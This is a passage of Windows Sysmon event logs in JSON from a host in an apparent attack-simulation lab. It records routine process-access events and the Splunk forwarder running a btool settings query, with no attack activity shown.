C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1690,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.271\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nTargetProcessId: 3864\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.271","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","TargetProcessId":"3864","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.290\r\nProcessGuid: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nProcessId: 3884\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nParentProcessId: 3864\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.290","ProcessGuid":"{E2A3D6B1-106C-5F25-0000-001001650300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","ParentProcessId":"3864","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010EE620300}\r\nSourceProcessId: 3864\r\nSourceThreadId: 3868\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010EE620300}","SourceProcessId":"3864","SourceThreadId":"3868","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001001650300}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-106C-5F25-0000-001001650300}\r\nTargetProcessId: 3884\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-106C-5F25-0000-001001650300}","TargetProcessId":"3884","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:16.286","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:16.286\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 